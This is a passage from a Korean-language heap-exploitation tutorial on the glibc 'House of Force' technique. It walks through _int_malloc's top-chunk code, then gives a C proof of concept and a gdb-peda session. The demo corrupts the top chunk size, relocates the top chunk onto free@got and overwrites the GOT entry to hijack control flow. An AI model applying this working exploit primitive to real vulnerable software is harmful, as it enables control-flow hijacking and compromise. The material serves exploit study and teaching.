main_arena→top이 가지고 있는 값(현재 top chunk의 주소)을 victim(아래 코드에서는 p)에 저장하고, chunksize()로 구한 top chunk의 크기를 size에 저장합니다.
malloc()은 "size"가 가지고 있는 값이 "새로 요청된 메모리의 크기(nb) + chunk의 최소 크기(MINSIZE)" 보다 크거나 같은 경우 Top chunk의 공간을 사용합니다. 이 비교는 unsigned long 끼리 이루어지므로, top chunk의 size를 0xffffffffffffffff처럼 매우 큰 값으로 덮어쓰면 (예제처럼 음수에 해당하는 거대한 요청 크기를 포함해) 사실상 어떤 nb에 대해서도 검사를 통과합니다. 참고로 glibc 2.29부터는 이 경로에 size가 av->system_mem보다 크면 "malloc(): corrupted top size"로 중단시키는 검사가 추가되어, 이 기법은 그 이전 버전의 glibc에서만 그대로 동작합니다.
"size"에 저장된 값에서 새로 요청된 메모리의 크기(nb)를 뺀 값을 "remainder_size"에 저장하고, victim의 주소에 nb를 더한 주소(chunk_at_offset(victim, nb))를 "remainder"에 저장합니다. 이 덧셈은 64비트 정수 범위를 넘어가면 그대로 wrap-around 하기 때문에, nb가 충분히 크면 remainder가 원래 top chunk보다 낮은 주소(예제에서는 0x602110 + 0xffffffffffffeef0 = 0x601000)가 될 수 있습니다.
remainder를 main_arena→top에 저장합니다. 즉 공격자가 요청 크기(nb)를 조절할 수 있으면 top chunk를 원하는 주소로 옮길 수 있고, 다음 malloc()은 그 주소의 chunk에서 메모리를 잘라 돌려줍니다(예제에서는 top이 0x601000이 되고, 다음 malloc(256)이 0x601010을 반환합니다).
set_head()를 이용하여 victim→size에 nb(PREV_INUSE 비트, main arena가 아니면 NON_MAIN_ARENA 비트를 함께 설정)를 저장하고, remainder→size에 remainder_size(PREV_INUSE 비트 설정)를 저장합니다. 이때 remainder→size 쓰기는 옮겨진 top chunk 주소 + 8에 일어나므로(예제에서는 0x601008), top chunk를 옮길 목적지 주변이 이 8바이트 쓰기를 견딜 수 있어야 합니다.
malloc()은 chunk2mem(p)을 호출하여 사용자에게 돌려줄 주소(p + 2*SIZE_SZ, 64비트에서는 p + 0x10)를 반환합니다.
/* finally, do the allocation */ p = av->top; size = chunksize (p); /* check that one of the above allocation paths succeeded */ if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE)) { remainder_size = size - nb; remainder = chunk_at_offset (p, nb); av->top = remainder; set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0)); set_head (remainder, remainder_size | PREV_INUSE); check_malloced_chunk (av, p, nb); return chunk2mem (p); } |
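#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>

/* free@got of the write-up's binary, as reported by "elfsymbol free" in gdb.
 * The address is stable only because the binary is not PIE; re-read it for
 * any other build. */
#define FREE_GOT   0x601018UL
/* Size of a malloc chunk header (prev_size + size) on x86_64: 2 * SIZE_SZ. */
#define CHUNK_HDR  0x10UL

/*
 * The House of Force, proof of concept (x86_64, non-PIE, glibc before 2.29).
 *
 * 1. buf1 = malloc(256) gets a 0x110-byte chunk, so the top chunk starts at
 *    buf1 + 0x100 and its size field lives at buf1 + 0x108, i.e. buf1[33].
 *    That field is overwritten with 0xffffffffffffffff; _int_malloc()'s
 *    unsigned "size >= nb + MINSIZE" check on the top chunk then passes for
 *    practically any request size.
 * 2. A huge request makes av->top = old_top + nb wrap around to the chosen
 *    address: the chunk that sits just before free@got (0x601000 here).
 * 3. The next malloc(256) is carved from the relocated top chunk and returns
 *    new_top + 0x10 (0x601010), so buf3[1] is free@got.  Writing there and
 *    then calling free() diverts control through the corrupted GOT entry; with
 *    0x4141414141414141 the jmp faults (SIGSEGV), which is the visible proof.
 *
 * The heap address is taken from buf1 at run time instead of being hard-coded,
 * so the computed request size stays correct even when the heap base moves.
 * glibc 2.29 and later abort this path with "malloc(): corrupted top size".
 */
int main(int argc, char *argv[])
{
    unsigned long *buf1, *buf2, *buf3;
    uintptr_t old_top, new_top;
    size_t evil_size;

    (void)argc;
    (void)argv;

    fprintf(stderr,"The house of Force");

    /* Step 1: first allocation; the top chunk directly follows its chunk. */
    buf1 = malloc(256);
    if (buf1 == NULL) {
        perror("malloc");
        return 1;
    }
    old_top = (uintptr_t)buf1 + 0x100;      /* chunk(buf1) + 0x110 */
    buf1[33] = 0xffffffffffffffff;           /* top chunk size field = old_top + 8 */

    /* Step 2: relocate the top chunk.  malloc rounds the request to
     * nb = (req + 8 + 15) & ~15 and sets av->top = old_top + nb.  Because
     * new_top - old_top is a multiple of 16, req = (new_top - old_top) - 0x10
     * rounds to exactly new_top - old_top.  For the heap layout shown in the
     * write-up this evaluates to 0xffffffffffffeee0. */
    new_top   = FREE_GOT - 8 - CHUNK_HDR;    /* buf3 + 8 must be free@got */
    evil_size = (size_t)(new_top - old_top - CHUNK_HDR);
    buf2 = malloc(evil_size);
    if (buf2 == NULL) {
        fputs("oversized malloc() failed: top chunk was not relocated\n", stderr);
        return 1;
    }

    /* Step 3: served from the relocated top chunk: buf3 == new_top + 0x10.
     * The write must go to buf3[1] (buf3 + 8) to hit free@got; buf3[0] would
     * clobber the preceding GOT slot instead. */
    buf3 = malloc(256);
    buf3[1] = 0x4141414141414141;
    free(buf3);    /* free@plt jumps through the overwritten GOT entry */
    return 0;
}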
lazenca0x0@ubuntu:~$ gcc -o test test.c lazenca0x0@ubuntu:~$ gdb -q ./test Reading symbols from ./test...(no debugging symbols found)...done. gdb-peda$ disassemble main Dump of assembler code for function main: 0x00000000004005f6 <+0>: push rbp 0x00000000004005f7 <+1>: mov rbp,rsp 0x00000000004005fa <+4>: sub rsp,0x30 0x00000000004005fe <+8>: mov DWORD PTR [rbp-0x24],edi 0x0000000000400601 <+11>: mov QWORD PTR [rbp-0x30],rsi 0x0000000000400605 <+15>: mov rax,QWORD PTR [rip+0x200a54] # 0x601060 <stderr@@GLIBC_2.2.5> 0x000000000040060c <+22>: mov rcx,rax 0x000000000040060f <+25>: mov edx,0x12 0x0000000000400614 <+30>: mov esi,0x1 0x0000000000400619 <+35>: mov edi,0x400714 0x000000000040061e <+40>: call 0x4004e0 <fwrite@plt> 0x0000000000400623 <+45>: mov edi,0x100 0x0000000000400628 <+50>: call 0x4004d0 <malloc@plt> 0x000000000040062d <+55>: mov QWORD PTR [rbp-0x18],rax 0x0000000000400631 <+59>: mov rax,QWORD PTR [rbp-0x18] 0x0000000000400635 <+63>: add rax,0x108 0x000000000040063b <+69>: mov QWORD PTR [rax],0xffffffffffffffff 0x0000000000400642 <+76>: mov rdi,0xffffffffffffeee0 0x0000000000400649 <+83>: call 0x4004d0 <malloc@plt> 0x000000000040064e <+88>: mov QWORD PTR [rbp-0x10],rax 0x0000000000400652 <+92>: mov edi,0x100 0x0000000000400657 <+97>: call 0x4004d0 <malloc@plt> 0x000000000040065c <+102>: mov QWORD PTR [rbp-0x8],rax 0x0000000000400660 <+106>: mov rax,QWORD PTR [rbp-0x8] 0x0000000000400664 <+110>: add rax,0x8 0x0000000000400668 <+114>: movabs rdx,0x4141414141414141 0x0000000000400672 <+124>: mov QWORD PTR [rax],rdx 0x0000000000400675 <+127>: mov rax,QWORD PTR [rbp-0x8] 0x0000000000400679 <+131>: mov rdi,rax 0x000000000040067c <+134>: call 0x4004b0 <free@plt> 0x0000000000400681 <+139>: mov eax,0x0 0x0000000000400686 <+144>: leave 0x0000000000400687 <+145>: ret End of assembler dump. 
gdb-peda$ b *0x000000000040062d Breakpoint 1 at 0x40062d gdb-peda$ b *0x000000000040063b Breakpoint 2 at 0x40063b gdb-peda$ b *0x0000000000400649 Breakpoint 3 at 0x400649 gdb-peda$ b *0x0000000000400657 Breakpoint 4 at 0x400657 gdb-peda$ b *0x0000000000400672 Breakpoint 5 at 0x400672 gdb-peda$ b *0x000000000040067c Breakpoint 6 at 0x40067c gdb-peda$ |
gdb-peda$ r Starting program: /home/lazenca0x0/test The house of Force Breakpoint 1, 0x000000000040062d in main () gdb-peda$ i r rax rax 0x602010 0x602010 gdb-peda$ p main_arena.top $1 = (mchunkptr) 0x602110 gdb-peda$ p main_arena.top.size $2 = 0x20ef1 gdb-peda$ c Continuing. Breakpoint 2, 0x000000000040063b in main () gdb-peda$ x/i $rip => 0x40063b <main+69>: mov QWORD PTR [rax],0xffffffffffffffff gdb-peda$ i r rax rax 0x602118 0x602118 gdb-peda$ |
gdb-peda$ c Continuing. Breakpoint 3, 0x0000000000400649 in main () gdb-peda$ x/i $rip => 0x400649 <main+83>: call 0x4004d0 <malloc@plt> gdb-peda$ i r rdi rdi 0xffffffffffffeee0 0xffffffffffffeee0 gdb-peda$ ni 0x000000000040064e in main () gdb-peda$ i r rax rax 0x602120 0x602120 gdb-peda$ p main_arena.top $3 = (mchunkptr) 0x601000 gdb-peda$ c Continuing. Breakpoint 4, 0x0000000000400657 in main () gdb-peda$ x/i $rip => 0x400657 <main+97>: call 0x4004d0 <malloc@plt> gdb-peda$ i r rdi rdi 0x100 0x100 gdb-peda$ ni 0x000000000040065c in main () gdb-peda$ i r rax rax 0x601010 0x601010 gdb-peda$ |
0x40067c에서 free()를 호출하면 free@plt(0x4004b0)로 진입하고, free@plt의 첫 명령은 free@got(0x601018)에 저장된 주소로 jmp합니다. 이 시점까지 free()가 한 번도 호출되지 않았으므로 lazy binding 때문에 GOT 엔트리는 원래 free@plt+6(0x4004b6)을 가리키고 있었지만, 직전에 buf3 + 8 쓰기로 0x4141414141414141로 덮어써졌습니다. 따라서 jmp가 유효하지 않은(non-canonical) 주소로 분기하면서 SIGSEGV가 발생합니다.
gdb-peda$ c Continuing. Breakpoint 5, 0x0000000000400672 in main () gdb-peda$ x/i $rip => 0x400672 <main+124>: mov QWORD PTR [rax],rdx gdb-peda$ i r rax rdx rax 0x601018 0x601018 rdx 0x4141414141414141 0x4141414141414141 gdb-peda$ x/gx 0x601018 0x601018: 0x00000000004004b6 gdb-peda$ x/gx 0x00000000004004b6 0x4004b6 <free@plt+6>: 0xffe0e90000000068 gdb-peda$ elfsymbol free Detail symbol info free@reloc = 0 free@plt = 0x4004b0 free@got = 0x601018 gdb-peda$ c Continuing. Breakpoint 6, 0x000000000040067c in main () gdb-peda$ x/i $rip => 0x40067c <main+134>: call 0x4004b0 <free@plt> gdb-peda$ gdb-peda$ x/2i 0x4004b0 0x4004b0 <free@plt>: jmp QWORD PTR [rip+0x200b62] # 0x601018 0x4004b6 <free@plt+6>: push 0x0 gdb-peda$ p/x 0x4004b6 + 0x200b62 $7 = 0x601018 gdb-peda$ x/gx 0x601018 0x601018: 0x4141414141414141 gdb-peda$ c Continuing. Program received signal SIGSEGV, Segmentation fault. Stopped reason: SIGSEGV 0x00000000004004b0 in free@plt () gdb-peda$ |